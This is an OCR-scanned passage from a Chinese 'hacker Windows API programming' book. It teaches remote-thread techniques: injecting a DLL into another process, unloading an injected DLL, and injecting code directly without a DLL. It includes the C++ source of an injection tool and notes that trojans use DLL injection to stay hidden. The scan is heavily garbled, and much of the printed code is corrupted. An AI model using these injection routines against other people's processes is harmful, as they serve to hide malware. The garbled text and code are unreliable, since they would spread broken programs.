体位 置 为 “开始 ”一 “程序 ”一 “Microsoft Visual Studio 6.0” 一 “Microsoft Visual Studio 6.0 
Tools” 一 “Depends”。 打 开 该 程序 ， 依 次 单 击 菜单 项 “File” 一 “Open”， 在 “打开 ”对 话 
框 中 找到 所 写 的 FirstDll.dll 文件 ， 选 中 并 打开 (也 可 以 直接 进行 拖 忠 )， 其 工作 窗口 中 显示 了 
FirstDll.dll 的 信息 ， 如 图 3-26 所 示 。 






斩 , USER32.DLL 
日- 加 GDI32.DU 
.| KERNEL32.DU 

.县 | NTDLL,DLL 
人 辐 ] USER32.DLL 

吉 | KERNEL32.DLL 

DLL 导出 序号 导出 函数 名 

函数 入 口 RVA 
DLL 文件 依赖 的 其 他 DLL 文件 


图 3-26 Depends 显示 界面 


在 图 3-26 的 右 下 角 区 域 范围 显示 的 是 该 DLL 文件 导出 的 函数 。 从 图 3-26 中 可 以 看 出 ， 
FirstDll.dll 文件 只 导出 一 个 MsgBox 函数。 

对 于 Depends 的 介绍 就 这 么 多 ， 现 在 来 看 另外 一 个 工具 “PEID”。 该 工具 是 用 来 识别 软 
件 “ 指 纹 ” 信 息 〈 开 发 环境 、 版 本 、 加 这 信息 等 ) 的 。 将 FirstDll.dll 文件 拖 忠 到 PEID 界面 
上 ，PEID 会 自动 解析 出 该 DLL 文件 的 PE 结构 信息 ， 界 面 如 图 3-27 所 示 。 


PE 信息 查看 导出 函数 信息 
开发 环境 信息 或 壳 信 息 


图 3-27 PEID 显示 界面 
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从 图 3-27 可 以 看 出 ，PEID 最 下 方 的 只 读 编辑 框 中 显示 了 FirstDll.dll 文件 是 由 VC6 开发 
的 ， 并 且 版 本 是 Debug 版 本 。 单 击 “ 子 系统 ”右边 my 
的 “大 于 号 ”按钮 ， 会 显示 PE 结构 的 详细 信息 ， 

如 图 3-28 所 示 。 

在 图 3-28 中 的 PE 结构 详细 信息 的 下 半 部 分 有 
个 “目录 信息 ”其 中 的 第 一 个 目录 信息 就 是 导出 表 
信息 ， 单 击 “ 导 出 表 ” 最 右 侧 的 “大 于 号 ”按钮 ， 
出 现 “导出 查看 器 ”界面 ， 如 图 3-29 所 示 。 

从 图 3-29 中 可 以 看 出 ，FirstDll.dll 文件 只 有 一 
个 导出 函数 MsgBox()， 只 存在 一 个 导出 项 。 导 出 函 
数 的 信息 与 Depends 相同 。 

关于 DLL 的 编程 就 介绍 到 这 里 , 在 本 章 后 面 的 
内 容 中 会 涉及 具体 DLL 文件 相关 的 编程 应 用 。 





1 0000100A 0000100A 


DLL 的 名 称 


导出 函数 的 信息 





图 3-29 导出 查看 器 


3.5.2 ”远程 线程 的 编程 


Windows 操作 系统 下 ， 为 了 避免 各 个 进程 相互 影响 ， 每 个 进程 地 址 空间 都 是 被 隔离 的 。 
所 谓 “远程 线程 ”， 并 不 是 跨 计 算 机 的 ， 而 是 跨 进程 的 。 简 单 来 说 ， 就 是 进程 A 要 在 进程 B 
中 创建 一 个 线程 ， 这 就 叫 远程 线程 。 

关于 远程 线程 的 知识 ， 本 节 介 绍 3 个 例子 ， 分 别 是 DLL 的 注入 、 印 载 远程 DLL 和 不 依 
赖 DLL 进行 代码 注入 。3 个 例子 的 原理 是 相同 的 ， 只 要 掌握 其 中 一 个 例子 就 可 以 理解 其 他 两 
个 。 之 所 以 讲述 3 个 例子 ， 是 为 了 起 到 举一反三 的 作用 。 

远程 线程 被 森马、 外 挂 等 程序 广泛 使 用 ， 反 病毒 软件 中 也 离 不 开 远 程 线程 的 技术 。 技 术 
应 用 的 两 面 性 取决 于 自己 的 个 人 行为 意识 ， 良 性 的 技术 学 习 对 自己 的 人 生发 展 是 非常 有 好 处 
的 ， 就 算 谈 不 上 好 处 ， 至 少 不 会 给 自己 带 来 不 必要 的 麻烦 。 

1. DLL 远程 注入 

木马 或 病毒 编写 的 好 坏 取决 于 其 隐藏 的 程度 ， 而 不 在 于 其 功能 的 多 少 。 无 论 是 木马 还 是 
病毒 ， 都 是 可 执行 程序 。 如 果 它 们 是 EXE 文件 的 话 ， 那 么 在 运行 时 必定 会 产生 一 个 进程 ， 就 
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很 容易 被 发 现 。 为 了 不 被 发 现 ， 在 编写 木马 或 病毒 时 可 以 选择 将 其 编写 为 DLL 文件 。DLL 
文件 的 运行 不 会 单独 创建 一 个 进程 ， 它 的 运行 被 加 载 到 进程 的 地 址 空间 中 ， 因 此 其 隐蔽 性 相 
对 较 好 。DLL 文件 如 果 不 被 进程 加 载 又 如 何在 进程 的 地 址 空间 中 运行 呢 ? 方式 是 强制 让 某 进 
. 程 加 载 DLL 文件 到 其 地 址 空间 中 去 ， 这 个 强制 的 手段 就 是 现在 要 介绍 的 远程 线程 。 

创建 远程 线程 的 函数 CreateRemoteThread() 的 定义 如 下 : 


HANDLE CreateRemoteThread! 
HANDLE hProcess, 
LPSECURITY ATTRIBUTES 1pTHreadAttributes, 





DWORD dwStackSize, 
LPTHREAD START ROUTINE lpStartAddress, 
LPVOID lpParameter, 

DWORD dwCreationFlags, 

LPDWORD lpThreadId 


) 

该 函数 的 功能 是 创建 一 个 远程 的 线程 。 如 果 还 记得 CreateThread() 函 数 的 定义 的 话 ， 那 
么 就 来 和 CreateRemoteThread() 函 数 进行 比较 。 对 于 CreateThread() 函 数 来 说 ，CreateRem 
oteThread() 函 数 比 其 多 了 一 个 hProcess 参数 ， 该 参数 是 指定 要 创建 线程 的 进程 句柄 。 其 实 
CreateThread(0) 函 数 的 内 容 实现 就 是 依赖 于 CreateRemoteThread() 函 数 来 完成 的 。CreateThread() 
函数 0 : 


* @implemented 
wd 


HANDLE 

WINAPI 

CreateThread (LPSECURITY ATTRIBUTES lpThreadAttributes, 
DWORD dwStackSize, 
LPTHREAD START ROUTINE lpSstartAddress, 
EPVOID lpParameter, 
DWORD dwCreationFlags, 
LPDWORD lpThreadId) 


/* 创建 远程 线程 

return CreateRemoteThread(NtCurrentProcess(), 
lpThreadAttributes, 
dwSstackSize, 
lpStartAddress, 
lpParameter, 
dwCreationFlags, 
lJpThreadIgd); 

K 


在 上 面 的 代码 中 ，NtGetCurrentProcess() 函 数 的 功能 是 获得 当前 进程 的 名 柄 。Windows 并 
没有 提供 CreateThread0 函 数 的 源 代码 实现 ， 而 CreateThread0) 函 数 的 代码 为 什么 是 这 样 的 呢 ? 
这 在 后 面 的 章节 中 会 进行 介绍 。 

回 到 前 面 的 主题 ，CreateRemoteThread() 函 数 是 给 其 他 进程 创建 线程 使 用 的 ， 其 第 一 个 参 
数 是 指定 某 进 程 的 句柄 ， 获 取 进 程 的 句柄 使 用 前 面 介绍 过 的 API 函数 OpenProcess()， 该 函数 
需要 提供 PID 作为 参数 。 

除了 hProcess 参数 以 外 ， 剩 余 的 关键 参数 就 只 有 lpStartAddress 和 lpParameter 两 个 了 。 
lpStartAddress 指定 线程 函数 的 地 址 ，lpParameter 指定 传递 给 线程 函数 的 参数 。 前 面 提 到 ， 每 
个 进程 的 地 址 空间 是 隔离 的 ,那么 新 创建 的 线程 函数 的 地 址 也 应 该 在 目标 进程 中 ， 而 不 应 该 在 
调用 CreateRemoteThread() 函 数 的 进程 中 。 同 样 ， 传 递 给 线程 函数 的 参数 也 应 该 在 目标 进程 中 。 

如 何 让 线程 函数 的 地 址 在 目标 进程 中 呢 ? 如 何 让 线程 函数 的 参数 也 可 以 传递 到 目标 进程 








后 车 ldV swopuI 从 啊 酒 ” 才 呈 避 


| 








梧 苗 ldV swopuI 旦 酒 山 办 避 


”第 3 章 黑客 Windows API 编程 








中 呢 ? 在 讨论 这 个 问题 以 前 ， 先 来 考虑 线程 函数 要 完成 的 功能 。 前 面 提 到 ， 这 里 主要 完成 的 
功能 是 注入 一 个 DLL 文件 到 目标 进程 中 ， 那 么 线程 函数 的 功能 就 是 加 载 DLL 文件 。 加 载 DLL 
文件 的 方法 在 前 面 介 绍 过 ， 使 用 的 是 LoadLibrary() 函 数 。 回 顾 LoadLibrary0) 函 数 的 定义 : 


HMODULE LoadLibrary!( 
LPCTSTR lpFileName 
We 


看 一 下 线程 函数 的 定义 格式 ， 有 具体 如 下 : 
DWORD WINAPI ThreadProc'( 
TV lpParameter 

比较 两 个 函数 可 以 发 现 , 除了 函数 的 返回 值 类 型 和 参数 类 型 以 外 , 其 函数 格式 是 相同 的 。 

里 只 考虑 其 相同 的 部 分 。 因 为 其 函数 的 格式 相同 ， 首 先 调用 约定 相同 ， 都 是 WINAPI (也 就 
是 _stdcall 方式 ); 其 次 函数 个 数 相同 ， 都 只 有 一 个 。 那 么 ， 可 以 直接 把 LoadLibrary() 函 数 作为 
线程 函数 创建 到 指定 的 进程 中 。LoadLibrary() 的 参数 是 欲 加 载 的 DLL 文件 的 完整 路 径 ， 只 要 在 
CreateRemoteThread(0) 函 数 中 赋值 一 个 指向 DLL 文件 完整 路 径 的 指针 给 LoadLibrary0 函 数 即 可 。 
这 样 使 用 CreateRemoteThread0 〇 函数 就 可 以 创建 一 个 远程 线程 了 。 不 过 , 还 有 两 个 问题 没有 解决 ， 
首先 是 如 何 将 LoadLibrary0 函 数 的 地 址 放 到 目标 进程 空间 中 让 CreateRemoteThread() 调 用 ， 其 次 
是 传递 给 LoadLibrary() 函 数 的 参数 也 需要 在 目标 进程 空间 中 ， 并 且 要 通过 CreateRemoteThread() 
函数 指定 给 LoadLibrary(0) 函 数 。 

首先 解决 第 1 个 问题 ， 即 如 何 将 LoadLibrary() 函 数 的 地 址 放 到 目标 进程 空间 中 。 
LoadLibrary() 函 数 是 系统 中 的 Kernel32.dll 的 导出 函数 ，Kernel32.dll 这 个 DLL 文件 在 任何 进 
程 中 的 加 载 位 置 都 是 相同 的 ， 也 就 是 说 ，LoadLibrary() 函 数 的 地 址 在 任何 进程 中 的 地 址 都 是 
相同 的 。 因 此 ， 只 要 在 进程 中 获得 LoadLibrary() 函 数 的 地 址 ， 那 么 该 地 址 在 目标 进程 中 也 可 
以 使 用 。CreateRemoteThread() 函 数 的 线程 地 址 参数 直接 传递 LoadLibrary() 函 数 的 地 址 即 可 。 

其 次 解决 第 2 个 问题 , 即 如 何 将 欲 加 载 的 DLL 文件 完整 路 径 写 入 目标 进程 中 。 这 需要 借 
助 WriteProcessMemory() 函 数 ， 其 定义 如 下 : 


BOOL WritepProcessMemory ( 
HANDLE hProcess, // handle to process 











WPYOLID lpBaseAddress, // base of memory area 
LPVOTD JpBuffer, // data buffer 
DWORD nsize, // number of bytes to write 


LPDWORD lpNumberOfBytesWritten // number of bytes written 


); 

该 函数 的 功能 是 把 lpBuffer 中 的 内 容 写 到 进程 句柄 是 hProcess 进程 的 ljpBaseAddress 地 址 
处 ， 写 入 长 度 为 nSize。 

参数 说 明 如 下 。 

hProcess: 该 参数 是 指定 进程 的 进程 句柄 。 

ljpBaseAddress: 该 参数 是 指定 写 入 目标 进程 内 存 的 起 始 地址 。 

lpBuffer: 该 参数 是 要 写 入 目标 进程 内 存 的 缓冲 区 起 始 地 址 。 

nSize: 该 参数 是 指定 写 入 目标 内 存 中 的 缓冲 区 的 长 度 。 

lpNumberOfBytesWritten: 该 参数 用 于 接收 实际 写 入 内 容 的 长 度 。 








=D: 注 : 该 函数 的 功能 非常 强大 ， 比 如 在 破解 方面 ， 用 该 函数 可 以 实现 一 个 “内 存 补丁 "; 在 开发 方面 ， 该 函 
数 可 以 用 于 修改 目标 进程 中 指定 的 值 ( 比如 游戏 修改 器 可 以 修改 游戏 中 的 钱 、 红 、 蓝 等 ); 
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使 用 该 函数 可 以 把 DLL 文件 的 完整 路 径 写 入 到 目标 进程 的 内 存 地 址 中 ， 这 样 就 可 以 在 目 


标 进 程 中 用 LoadLibrary0) 函 数 加 载 指定 的 DLL 文件 了 。 解 决 了 上 面 的 两 个 问题 ,还 有 第 3 第 
个 问题 需要 解决 。WriteProcessMemory() 函 数 的 第 2 个 参数 是 指定 写 入 目标 进程 内 存 的 缓冲 区 | 章 
起 始 地 址 。 这 个 地 址 在 目标 进程 中 ， 那 么 这 个 地 址 在 目标 进程 的 哪个 位 置 呢 ? 目标 进程 中 的 黑 
内 存 块 允许 把 DLL 文件 的 路 径 写 进去 吗 ? 客 
第 3 个 要 解决 的 问题 是 如 何 确定 应 该 将 DLL 文件 的 完整 路 径 写 入 目标 进程 的 哪个 地 址 。 到 
对 于 目标 进程 来 说 ， 事 先是 不 会 准备 一 块 地 址 让 用 户 进 行 写 入 的 ， 用 户 能 做 的 是 自己 在 目标 站 
进程 中 申请 一 块 内 存 , 然后 把 DLL 文件 的 路 径 进行 号 入 ， 写 入 在 目标 进程 新 申请 到 的 内 存 空 二 
间 中 。 在 目标 进程 中 申请 内 存 的 函数 是 VirtualAllocEx()， 其 定义 如 下 : 卫 
LEVOID VirtaalAllocEx'( 编 
LEVOID 1pAddross, 本 
S12E TY QWwSdize, 
DWORD flAllocationType; 
DWORD fliprotect | 


)? 
VirtualAllocExO 函 数 的 参数 说 明 如 下 。 

hProcess: 该 参数 是 指定 进程 的 进程 句柄 。 

lpAddress: 该 参数 是 指 在 目标 进程 中 申请 内 存 的 起 始 地 址 。 

dwSize: 该 参数 是 指 在 目标 进程 中 申请 内 存 的 长 度 。 

flAllocationType: 该 参数 指定 申请 内 存 的 状态 类 型 。 

flProtect: 该 参数 指定 申请 内 存 的 属性 。 

该 函数 的 返回 值 是 在 目标 进程 申请 到 的 内 存 块 的 起 始 地 址 。 

到 此 , 关于 编写 一 个 DLL 注入 的 所 有 知识 都 已 经 。 ppgypyo 
具备 了 。 现在 开始 编写 一 个 DLL 注入 的 工具 , 其 界面 we i 
如 图 3-30 所 示 。 Re | 

该 工具 有 2 个 作用 ， 分 别 是 注入 DLL 和 印 载 被 注 。 器 入 | | 到 | we | 
入 的 DLL。 关 于 仓 载 被 注入 的 DLL 的 功能 ， 将 在 后 i 
面 进行 介绍 。 在 界面 上 要 求 输入 两 部 分 内 容 ， 第 1 部 Na 
分 是 欲 注入 的 DLL 文件 的 完整 路 径 (一 定 要 是 完整 路 径 )， 第 2 部 分 是 进程 的 名 称 。 

首先 看 一 下 关于 界面 的 操作 ， 代 码 如 下 : 

void CIinjectDilDlg::OnBtnIinject() 


// 添加 处 理 程 序 代码 

char szDlIliName MAX PATH) 过 QMm}; 
char szPprocessName [MAXBYTE] = { 0 }; 
DWORD dwPid = 0; 
















GetDlgItemText (1DC EDIT DLLFILE, szDllName, MAX PATH) 7 
GetDlgIitemText (1DC EDIT PROCESSNAME, szProcessName, MAXBYTE); 


// 由 进程 名 获得 PID 


dwPid = GetProcld(lszProcessName)’; 





// 注入 szDllName 到 dwBid 
InjectD1ll'(dwPid, szDllName); 
} 


代码 中 调用 了 另外 两 个 函数 ， 第 1 个 是 由 进程 名 获得 PID 的 函数 ， 第 2 个 是 用 于 DLL 
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注入 的 函数 。GetProcId() 函 数 的 代码 如 下 : 


DWORD CInjectD1ll1Dl1g:;:GetPproocIld(char *szProcessName) 


{ 


BOOL bRet; 
PROOCESSENTRY32 ped2.; 
HANDLE hsnap; 


hsnap = CreateToolhelp32Snapshot (TH32CS_ SNAPPROCESS, 
pe32.dwSize = sizeof (Pe32) 7 
bRet = Process32First (hsnap, &pe32)} 


while ( bRet 


{ 
// strupr() 函数 是 将 字符 串 转化 为 大 写 
if'"( lstremp(lstrupr (pe32. 5SzRXeRile)， 
strupr(szProcessName)) == 0 ) 
{ 
return pe32.,th32ProcessTiD; 
} 


bRet = Process32Next (hsSnap, &pe32): 
} 


Cet 必 吉 


InjectDll(0) 函 数 的 代码 如 下 : 


VorID CinjeeeDlilDlg: :Tiniectnll WORDIGWE3G7 


{ 


if ( dwPid == || lstrlen(szDllName) == 0 ) 
{ 
return 7 
} 
char *pFunName = "LOoadLibraryA"’ 


// 打开 目标 进程 
HANDLE hpProcess = OpenPprocess (PROCESS_,ALL ACCESS, 
FALSE, dwPpid):; 


if ( hpProcess == NULL ) 
{ 
eet 


} 


// 计算 欲 注入 DLL 文件 完整 路 径 的 长 度 
int nDliten = lstrieh(szDlilName) + sizeof(char); 


// 在 目标 进程 申请 一 块 长 度 为 nDllLen 大 小 的 内 存 空间 

PVOID pDllAddr = VirtualAllocEx (hpProcess, 
NULL, nDlilLen, 
MEM COMMTT， 
PAGE READWRITE); 


if ( pDllAaAddr == NULL ) 

{ 
CloseHandle (hpProcess),; 
etupnm 


} 


DWORD dwWriteNum = 0; 


// 将 欲 注入 DLL 文件 的 完整 路 径 写 入 在 目标 进程 中 申请 的 空间 内 
WritePprocessMemory (hProcess, pDIlAddr, szDllName, 
nDllLen, &dwWriteNum); 





// 获得 LoadLibraryA() 函数 的 地 址 


NULL);» 


chat *szDllName) 
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FARPROC PEunaddr = GetProcAddress (GetModuleHandle ("kernel32.d11"), 
BEunNarme) 7 


// 创建 远程 线程 
HANDLE hThread = CreateRemoteThread (hProcess, 
Nb 0, 
(LPTHREAD START ROUTINE) pFEunAddr, 
有 DTIRQG OQ, NULL); 
WaitForSingleObject (hThread, INFINITE); 


CloseHandle (hThread); 
CloseHandle (hProcess); 
} 


InjectD11O 函 数 有 2 个 参数 ,分 别 是 目标 进程 的 ID 值 和 要 被 注入 的 DLL 文件 的 完整 路 径 。 
在 代码 中 获得 的 不 是 LoadLibrary(0) 函 数 的 地 址 ， 而 是 LoadLibraryA() 函 数 的 地 址 。 在 系统 中 
其 实 没有 LoadLibrary() 函 数 ， 有 的 只 是 LoadLibraryA() 和 LoadLibraryW() 两 个 函数 。 这 两 个 
函数 分 别针 对 ANSI 字符 串 和 UNICODE 字符 串 。 而 LoadLibrary() 函 数 只 是 一 个 宏 。 在 编写 
程序 的 时 候 ， 直 接 使 用 该 宏 是 可 以 的 。 如 果 要 获取 LoadLibraryO) 函 数 的 地 址 ， 就 要 明确 指定 
是 获取 LoadLibraryAO 还 是 LoadLibraryW0。 


LoadLibrary() 宏 定义 如 下 : 

#ifdef UNICODE 

#define LoadLibrary LoadLibraryW 
#eise 

#define LoadLibrary LoadLibraryA 
#endif // 1UNICODE 


只 要 涉及 字符 串 的 函数 ， 都 会 有 相应 的 ANSI 版 本 和 UNICODE 版 本 ;其余 不 涉及 字符 
串 的 函数 ， 没 有 ANSI 版 本 和 UNICODE 版 本 的 区 别 。 
为 了 测试 DLL 加 载 是 否 成 功 ， 在 前 一 节 代码 的 DIIMain(0) 函 数 中 加 入 如 下 代码 : 


case DID PROCESS.ATTACH': 
上 


MsgBox ("!DLL, PROCESS _RTTACHIn) ， 
break; 


} 
现在 测试 一 下 注入 的 效果 ， 如 图 3-31 和 图 3-32 所 示 。 





查看 (VW 才 助 (| 


DLL 加 载 成 功 
的 提示 


| BINE TE 


注 Sr ERE dll 了 


要 注入 的 进程 的 名 称 


图 3-31 DLL 文件 被 注入 成 功 的 提示 
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在 图 3-31 中 , 弹出 的 对 话 框 是 DLL 程序 在 DLL_PROCESS_ATTACH 时 出 现 的 。 其 所 在 
的 进程 为 notepad.exe。 从 图 3-31 中 可 以 看 出 ， 弹 出 提示 框 的 标题 处 是 notepad.exe 进程 的 路 
径 。 图 3-32 是 用 工具 查看 进程 中 所 加 载 的 DLL 文件 列表 ， 可 以 看 出 ， 通 过 注入 工具 注入 的 
DLL 文件 已 经 被 加 载 到 notepad.exe 的 进程 空间 中 。 














也 gaPprotect. exe 1868 320 1: Eee SN VQRFrc. . DBa 


BO5R BOI2 CDON 





ed = eee 7 。 WE 
L: \ 我 的 文件 到 ‘编程 cee \ In Ds Ox10000000 


Ci: 8 WINDONWS Winsxs We Mi croso EE i i 5. Ca os GxTT 180000 
C: WINOWS\system32"WS2HELP. 1 OxT1A1O0000 
C: "WINIOWSsystem32" Yo 32. D1 OxT1h20000 


图 3-32 查看 进程 中 的 DLL 列表 确认 被 装载 成 功 























sy 注 : 如 果 要 对 系统 进程 进行 注入 的 话 ， 由 于 进程 权限 的 关系 是 无 法 注入 成 功 的 。 在 打开 目标 进程 时 用 到 了 
OpenProcess() 函 数 ， 由 于 权限 不 够 ， 会 导致 无 法 打开 进程 并 获得 进程 句柄 ， 解 决 的 方法 在 前 面 的 内 容 中 
Cs 通过 调整 当前 进程 的 权限 , 可 以 打开 系统 进程 并 获得 进程 句柄 。 如 果 在 Win8 或 更 高 版 本 上 运 

行 注入 程序 的 话 ， 需 要 选中 注入 工具 单 击 右键 ， 选 择 “ 以 管理 员 身份 运行 ” 才 可 以 完成 注入 。 


2. 外 载 被 注入 的 DLL 文件 

DLL 注入 如 果 应 用 在 木马 方面 ， 和 危害 很 大 ， 这 里 完成 一 个 印 载 被 注入 DLL 的 程序 。 纯 
载 被 注入 DLL 程序 的 思路 和 注入 的 思路 是 一 样 的 , 而 且 代 码 的 改动 也 非常 小 。 区 别 在 于 现在 
的 功能 是 和 抒 载 ， 而 不 是 注入 。 

DLL 印 载 使 用 的 API 函数 是 FreeLiabrary()， 其 定义 如 下 : 


BOOL FreeLipbrary!( 
HMODULE hModule // handle to DLL module 
Di 


该 函数 的 参数 是 要 卸载 的 模块 的 句柄 。 

FreeLibrary0 函 数 使 用 的 模块 句柄 可 以 通过 前 面 介绍 的 Module32First0 和 Module32Next() 
两 个 函数 获取 。 在 介绍 进程 枚 举 时 介绍 了 PROCESSENTRY32 结构 体 。 在 使 用 Module32First() 
和 Module32Next() 两 个 函数 的 时 候 ， 需 要 用 到 MODULEENTRY32 结构 体 ， 该 结构 体 中 保存 
了 模块 的 句柄 。MODULEENTRY32 结构 体 的 定义 如 下 : 


typedef struct tagMODULEENTRY32 { 
DWORD dwSize; 
DWORD th32ModuleID; 
DWORD th32ProcessTD; 
DWORD GlblcontUsage; 
DWORD Procentlieager 
BYTE '* modBaseAddr; 
DWORD modBaseSize; 
HMODULE hModule; 
TCHAR szModule [MAX MODULE NAME32 + 1]; 
TCHAR szExePath[MAX PATH]; 
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} MODULEENTRY32; 
typedef MODULEENTRY32 *PMODULEENTRY32; 


该 结构 体 中 的 hModule 为 模块 的 句柄 ，szModule 为 模块 的 名 称 ，szExePath 是 完整 的 模 
块 的 名 称 《〈 所 谓 完整 ， 包 括 路 径 和 模块 名 称 )。 
卸载 远程 进程 中 DLL 模块 的 代码 如 下 : 


VOID CinjectDiliDlg:UnIin eectDIl (BWOoORD dwPid, char *szDIlName) 


{ 
i ( dwPid == 0 || lstrlen(szDllName) == 0 ) 
{ 
Teturny 
} 


HANDLE hsnap = CreateToolhelp32Snapshot( 
TH32CS_SNAPMODULE, 
dwpid); 


MODULEENTRY32 me32; 
me32.dwSize = sizeof (me32); 


// 查找 匹配 的 进程 名 称 
BOOL bRet = Modlble32First (hsSnap, &me32),; 
while ( bRet ) 


if ( lstrcmp (strupr (me32.szExePath), 
strupr(szDIilName)) == 0 ) 
{ 
break; 


} 


bRet = Module32Nezxt (hsSnap, &me32); 


CloseHandle (hsnap); 
char *pFunName = "FreeLibrary"; 


HANDLE hProcess = OpenProcess (PROCESS ALL ACCESS, 
FALSE, dwPpidy): 

了 于 ( hprocess == NULL ) 

{ 


return 上/ 


} 


FARPROC pFunAddr = GetProcAddress (GetModuleHandle("kernel132.dql11")， 
pFunName); 


HANDLE hThread = CreateRemoteThread (hpProcess, NULL, 0, 
(LPTHREAD_ START. ROUTINE)pFunAddr, 
me32.hModule, 0, NULL); 

WaitForSsingleObject (hThread, INEFINITE); 


CloseHandle (hThread); 
CloseHandle (hProcess); 


} 

卸载 远程 进程 中 DLL 的 实现 代码 比 DLL 注入 的 代码 要 简单 , 这 里 就 不 做 过 多 的 介绍 了 。 

3. 无 DLL 的 代码 注入 

DLL 文件 的 注入 与 卸载 都 完成 了 ， 整 个 注入 与 全 载 的 过 程 其 实 就 是 让 远程 线程 执行 一 次 
LoadLibraryO 函 数 或 FreeLibrary() 函 数 。 远 程 线程 装载 一 个 DLL 文件 ， 通 过 DIIMainO) 调 用 
DLL 中 的 具体 功能 代码 ， 这 样 注 入 DLL 后 就 可 以 让 DLL 做 很 多 事情 了 。 是 否 可 以 不 依赖 
DLL 文件 直接 问 目 标 进程 写 入 要 执行 的 代码 ， 以 完成 特定 的 功能 呢 ? 答 案 是 可 以 。 
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要 在 目标 进程 中 完成 一 定 的 功能 ， 就 需要 使 用 相关 的 API 函数 ， 不 同 的 API 函数 实现 在 不 























和 同 的 DLL 中 。Kermnel32.dll 文件 在 每 个 进程 中 的 地 址 是 相同 的 ， 但 是 并 不 代表 其 他 DLL 文件 在 
章 | 每 个 进程 中 的 地 址 都 是 一 样 的 。 这 样 ， 在 目标 进程 中 调用 API 函数 时 ， 必 须 使 用 LoadLibrary() 
昌 | 函数 和 GetprocAddressO 函 数 动态 调用 用 到 的 每 个 API 函数 。 把 想 要 使 用 的 API 函数 及 API 函数 
客 所 在 的 DLL 文件 都 封装 到 一 个 结构 体 中 ， 直 接 写 入 目标 进程 的 空间 中 。 同 时 也 直接 把 要 在 远程 
执行 的 代码 也 写 入 目标 进程 的 内 存 空间 中 ， 最 后 调用 CreateRemoteThread() 函 数 即 可 将 其 运行 。 
自 通过 实现 一 个 简单 的 例子 让 远程 线程 弹出 一 个 提示 对 话 框 , 但 是 不 借助 于 DLL。 本 程序 所 
包 使 用 的 API 函数 在 前 面 都 已 经 介绍 过 了 。 根 据 前 面 的 步骤 先 来 定义 一 个 结构 体 ， 其 定义 如 下 : 
瑟 #define STREEN 20 
编 typedef struct _DATA 
程 { 

DWORD dwloadLibrary; 

DWORD dwGetProcAddress’; 

DWORD dwGetModuleHandle; 

De DWORD dwGetModuleFileName; 


char Userd2DlllSTRbaNI; 
char MessageBox[lSTRLEN]; 
cnarlorrtsTnbonl 

}DATA, *PDATA; 


该 结构 体 中 保存 了 LoadLibraryA()、GetProcAddress()、GetModuleHandle() 和 GetModu 
leFileName() 四 个 API 函数 的 地 址 。 这 四 个 API 函数 都 属于 Kernel32.dll 的 导出 函数 ， 因 此 可 
以 在 注入 前 进行 获取 。User32D1l 中 保存 “User32.dll” 字 符 串 ， 因 为 MessageBoxA() 函 数 是 由 
User32.dll 的 导出 函数 。Str 中 保存 的 是 通过 MessageBoxA( 函 数 弹 出 的 字符 串 。 

注入 代码 类 似 于 前 面 介绍 的 注入 代码 ， 不 过 需要 在 注入 代码 中 定义 一 个 结构 体 变量 ， 并 
进行 相应 的 初始 化 ， 代 码 如 下 : 

VOID CNoDllInjectDlog:yInjectCcode (DWORD dwpPid) 


{ 
// 打开 进程 并 获取 进程 句柄 
HANDLE hProcess = OpenPprocess (PROCESS, ALL ACCESS, 
FALSE, dwpid); 





LE hprocess ==)NUELL ) 
{ 


1 


大 人 


DATA, patia = TO ji 


// 获取 kernel32.d1ll 中 相关 的 导出 函数 
Data.dwLoadLibrary = (DWORD)GetProcAddress'! 
GetModuleHandle ("kernel32.d11"), 
"LoadLibraryA"); 
Data.dwGetProcAddress = (DWORD)GetProcAddress! 
GetModuleHandle ("kernel32.d11"), 
"GetProcAddress"); 
Data.dwGetModuleHandle = (DWORD)GetProcAddress!( 
GetModuleHandle("kernel32.d11"), 
"GetModuleHandleA"); 
Data.dwGetModuleFileName = (DWORD)GetProcAddress'!( 
GetModuleHandle ("kernel32.d11"), 
"GetModuleFileNameA"); 


// 需要 的 其 他 DLL 和 导出 函数 
stropy(bata taervB2Dll er dl 
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lstrcpy (Data,MessageBox, "MessageBoxRA") : 
// MessageBoxA() 弹 出 的 字符 串 


lstrepy (Data.Str, “Inject Code !111"); 第 
es 3 
// 在 目标 进程 申请 空间 襄 
LPVOID lpData = VirtualAllocEx (hProcess, NULL, sizeof (Data), 
MEM COMMIT | MEM RELEASE, 
PAGE READWRITE); 
DWORD dwWriteNum = 0; 3 
WritePprocessMemory (hProcess, lpData, &Data, = 
sizeof (Data), &dwWriteNum); 
三 
// 在 目标 进程 空间 申请 的 用 于 保存 代码 的 长 度 全 
DWORD dwFunSize = 0x4000; > 
LPVOID lpCode = VirtualAllocEx (hProcess, NULL, dwFunsize, En 
MEM_COMMIT, 编 
PAGE EXECUTE READWRITE); 程 
WriteProcessMemory (hProcess, lpCode, &RemoteThreadProc, 
dwFunSize, &dwWriteNum); 
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0 Ni 


(LPTHREAD_START ROUTINE) lpCode, 
lpData, 0, NULL); 
WaitForsingleObject (hThread, INFINITE); 


CloseHandle (hThread); 
CloseHandle (hProcess); 
} 


上 面 的 注入 代码 除了 对 结构 体 变 量 初始 化 外 ， 还 将 线程 函数 代码 写 入 目标 进程 空间 的 内 
存 中 。 线 程 函 数 的 代码 如 下 : 


DWORD WINAPI RemoteThreadProc(LPVOID lpParam) 


{ 
PDATA pData = (PDATA) lpParam; 


// 定 头 API 函数 原型 | 
HMODULE {_ stdcall *MyLoadLibrary) (LPCTSTR);? 

FARPROC ({_ stdcall *MyGetProcAddress) (HMODULE, LPCSTR); 
HMODULE (_ stdcall *MyGetModuleHandle) (PCTSTR) 

int ({ ‘stdcall *MyMessageBox) (HWND, LPCTSTR, LPCTSTR, UINT); 
DWORD (_ stdcail *MyGetModuleFileName) (HMODULE, LPTSTR, DWORD); 


// 对 各 函数 地 址 进行 赋值 

MyLoadLibrary = (HMODULE (_ stdcall *) (LPCTSTR)) 
pData->dwLoadLibrary; 

MyGetProcAddress = (FARPROC ( stdcall *) (HMODULE, LPCSTR)) 
pData->dwGetProcAddress; 

MyGetModuleHandle = (HMODULE (stdcall *) (LPCSTR)) 
pData—>dwGetModuleHandle; 

MyGetModuleFileName = (DWORD (_ stdcall *) (HMODULE, LPTSTR, DWORD)) 
pData->dwGetModuleFileName; 

// 加 载 User32.dl11 

HMODULE hModule = MyLoadLibrary (PData->User32DI1) 

// 获得 MessageBoxA 函数 的 地 址 

MyMessageBox = (int (_ stdcall *) (HWND, LPCTSTR, LPCTSTR, UINT)) 
MyGetProcAddress (hModule, pData->MessageBox); 


